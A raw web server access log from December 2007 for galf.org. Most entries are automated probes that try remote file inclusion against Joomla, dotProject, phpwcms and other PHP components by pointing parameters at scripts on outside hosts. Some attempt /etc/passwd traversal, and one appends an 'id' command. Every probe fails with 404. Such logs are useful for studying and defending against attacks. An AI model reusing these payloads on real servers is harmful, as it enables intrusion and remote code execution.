85.119.158.50 - - [09/Dec/2007:17:25:01 -0800] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [09/Dec/2007:17:25:01 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
203.157.182.9 - - [09/Dec/2007:17:25:01 -0800] "GET /index2.php?x=http://www.xsenhamaximo.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.54.45.2 - - [09/Dec/2007:17:25:14 -0800] "GET //dotproject/modules/files/index_table.php?root_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:25:40 -0800] "GET /logs/access_071015.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:25:40 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:25:40 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:25:42 -0800] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:26:13 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.38.50.26 - - [09/Dec/2007:17:26:13 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:26:13 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:26:44 -0800] "GET /logs/access_071015.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
201.82.80.104 - - [09/Dec/2007:17:27:25 -0800] "GET /logs/access_071119.log HTTP/1.1" 200 9760965 "-" "jsnebdKlfvkerrmksvpmlxvq2veph"
195.10.195.202 - - [09/Dec/2007:17:27:27 -0800] "GET /logs/access_070806.log//components/com_flyspray/startdown.php?file=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.119.158.50 - - [09/Dec/2007:17:27:32 -0800] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
195.10.195.202 - - [09/Dec/2007:17:27:32 -0800] "GET //components/com_flyspray/startdown.php?file=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.202 - - [09/Dec/2007:17:27:33 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.62.220.37 - - [09/Dec/2007:17:27:56 -0800] "GET /logs/access_071008.log/index.php?p=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.62.220.37 - - [09/Dec/2007:17:27:56 -0800] "GET /index.php?p=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.62.220.37 - - [09/Dec/2007:17:27:57 -0800] "GET /logs/index.php?p=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:27:58 -0800] "GET /logs/access_071105.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:27:59 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:27:59 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:28:26 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:28:26 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.238.199.72 - - [09/Dec/2007:17:28:26 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:28:51 -0800] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.30.216.95 - - [09/Dec/2007:17:29:14 -0800] "GET /logs/access_071015.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.10.195.202 - - [09/Dec/2007:17:29:21 -0800] "GET /logs/access_070827.log//components/com_flyspray/startdown.php?file=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.119.158.50 - - [09/Dec/2007:17:30:14 -0800] "GET /logs/access_071001.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [09/Dec/2007:17:30:15 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48"
85.119.158.50 - - [09/Dec/2007:17:30:15 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:30:39 -0800] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.27.144.142 - - [09/Dec/2007:17:31:15 -0800] "GET /logs/access_071014.log/db_adodb.php?baseDir=http://www.kalinovka.com/files/thumbs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.27.144.142 - - [09/Dec/2007:17:31:16 -0800] "GET /logs/db_adodb.php?baseDir=http://www.kalinovka.com/files/thumbs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
161.53.149.3 - - [09/Dec/2007:17:31:54 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.themonuments.co.uk/language/.../id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.10.195.202 - - [09/Dec/2007:17:32:10 -0800] "GET /logs/access_071015.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.202 - - [09/Dec/2007:17:32:15 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.202 - - [09/Dec/2007:17:32:15 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.53.149.3 - - [09/Dec/2007:17:32:18 -0800] "GET /logs/access.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.themonuments.co.uk/language/.../id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
161.53.149.3 - - [09/Dec/2007:17:32:19 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.themonuments.co.uk/language/.../id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
161.53.149.3 - - [09/Dec/2007:17:32:19 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.themonuments.co.uk/language/.../id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.10.195.202 - - [09/Dec/2007:17:32:22 -0800] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.53.149.3 - - [09/Dec/2007:17:32:33 -0800] "GET /logs/access_071203.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.themonuments.co.uk/language/.../id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.89.224.76 - - [09/Dec/2007:17:32:37 -0800] "GET /logs/access_071203.log HTTP/1.0" 200 6874512 "-" "Wget/1.10.2" "galf.org"
72.30.214.230 - - [09/Dec/2007:17:33:09 -0800] "GET /logs/access_071105.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
140.130.42.103 - - [09/Dec/2007:17:33:55 -0800] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vhyan.com/scn/asccmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.113.69.15 - - [09/Dec/2007:17:34:33 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
63.113.69.15 - - [09/Dec/2007:17:34:35 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.59.192.76 - - [09/Dec/2007:17:35:37 -0800] "GET //include.php?path[docroot]=http://www.bsky.org//components/com_extcalendar/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
140.130.42.103 - - [09/Dec/2007:17:35:55 -0800] "GET /logs/access_071014.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vhyan.com/scn/asccmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.100.253.45 - - [09/Dec/2007:17:36:04 -0800] "GET /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://kilicarslan.ch/cc.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.galf.org"
209.59.192.76 - - [09/Dec/2007:17:36:29 -0800] "GET /logs//include.php?path[docroot]=http://www.bsky.org//components/com_extcalendar/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.59.192.76 - - [09/Dec/2007:17:37:00 -0800] "GET /logs/access_071015.log//include.php?path[docroot]=http://www.bsky.org//components/com_extcalendar/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.141.149 - - [09/Dec/2007:17:37:15 -0800] "GET /logs/access_071105.log/default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.22.162.60 - - [09/Dec/2007:17:38:14 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:17:38:14 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.245.124.200 - - [09/Dec/2007:17:38:47 -0800] "GET /logs/access_071014.log//dotproject/modules/files/index_table.php?root_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.245.124.200 - - [09/Dec/2007:17:38:47 -0800] "GET //dotproject/modules/files/index_table.php?root_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.245.124.200 - - [09/Dec/2007:17:38:48 -0800] "GET /logs//dotproject/modules/files/index_table.php?root_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.50.53.151 - - [09/Dec/2007:17:39:26 -0800] "GET /logs/access_071029.log//shop/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dor.or.kr/zboard/data/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
218.50.53.151 - - [09/Dec/2007:17:39:27 -0800] "GET //shop/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dor.or.kr/zboard/data/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.50.53.151 - - [09/Dec/2007:17:39:27 -0800] "GET /logs//shop/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dor.or.kr/zboard/data/safe.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:39:37 -0800] "GET /logs/access_071014.log/main.php?table=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:39:37 -0800] "GET /main.php?table=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:39:37 -0800] "GET /logs/main.php?table=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.45.2 - - [09/Dec/2007:17:40:29 -0800] "GET /logs/access_071014.log//dotproject/modules/files/index_table.php?root_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.45.2 - - [09/Dec/2007:17:40:29 -0800] "GET /logs//dotproject/modules/files/index_table.php?root_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:40:44 -0800] "GET /logs/access_070917.log/main.php?table=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.59.192.76 - - [09/Dec/2007:17:41:40 -0800] "GET /logs/access_070924.log//include.php?path[docroot]=http://www.bsky.org//components/com_extcalendar/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.237.203.125 - - [09/Dec/2007:17:44:49 -0800] "GET /logs/middle.php?file=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.237.203.125 - - [09/Dec/2007:17:44:50 -0800] "GET /middle.php?file=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.190.193.116 - - [09/Dec/2007:17:47:03 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [09/Dec/2007:17:47:04 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.156 - - [09/Dec/2007:17:50:37 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:17:51:34 -0800] "GET /logs/access_071022.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:17:51:34 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:17:51:34 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
140.130.42.103 - - [09/Dec/2007:17:52:50 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://vhyan.com/scn/asccmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
140.130.42.103 - - [09/Dec/2007:17:52:50 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://vhyan.com/scn/asccmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
140.130.42.103 - - [09/Dec/2007:17:52:51 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://vhyan.com/scn/asccmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.156 - - [09/Dec/2007:17:53:50 -0800] "GET /logs/access_070709.log HTTP/1.0" 200 917504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:17:54:36 -0800] "GET /logs/access_070924.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:17:54:36 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.22.162.60 - - [09/Dec/2007:17:54:36 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:17:54:55 -0800] "GET /logs/access_071022.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:55:02 -0800] "GET /logs/middle.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.208.170 - - [09/Dec/2007:17:55:03 -0800] "GET /middle.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.208.228.216 - - [09/Dec/2007:17:55:51 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
63.249.90.38 - - [09/Dec/2007:17:56:12 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://tutorialonline.info/portal/cache/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
69.94.10.114 - - [09/Dec/2007:17:56:38 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
63.249.90.38 - - [09/Dec/2007:17:56:58 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://tutorialonline.info/portal/cache/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:57:12 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:57:12 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:57:12 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
128.46.156.155 - - [09/Dec/2007:17:57:16 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:58:29 -0800] "GET /logs/access_071022.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:59:13 -0800] "GET /logs/access_070723.log/middle.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:59:13 -0800] "GET /middle.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:59:13 -0800] "GET /logs/middle.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:17:59:20 -0800] "GET /logs/access_071028.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
90.156.145.60 - - [09/Dec/2007:18:00:46 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.32.85.218 - - [09/Dec/2007:18:01:00 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.195.47.248 - - [09/Dec/2007:18:01:12 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.190.193.116 - - [09/Dec/2007:18:01:37 -0800] "GET /logs/access_071001.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:18:05:07 -0800] "GET /logs/access_071014.log//dotproject/modules/files/index_table.php?root_dir=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:18:05:07 -0800] "GET //dotproject/modules/files/index_table.php?root_dir=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:18:05:07 -0800] "GET /logs//dotproject/modules/files/index_table.php?root_dir=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.208.170 - - [09/Dec/2007:18:06:03 -0800] "GET /logs/middle.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:06:03 -0800] "GET /middle.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.10.46.165 - - [09/Dec/2007:18:06:09 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.100.220.45 - - [09/Dec/2007:18:07:26 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.156 - - [09/Dec/2007:18:08:04 -0800] "GET /logs/access.log HTTP/1.0" 200 76047 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
82.100.220.45 - - [09/Dec/2007:18:08:26 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:18:08:39 -0800] "GET /logs/access_071105.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
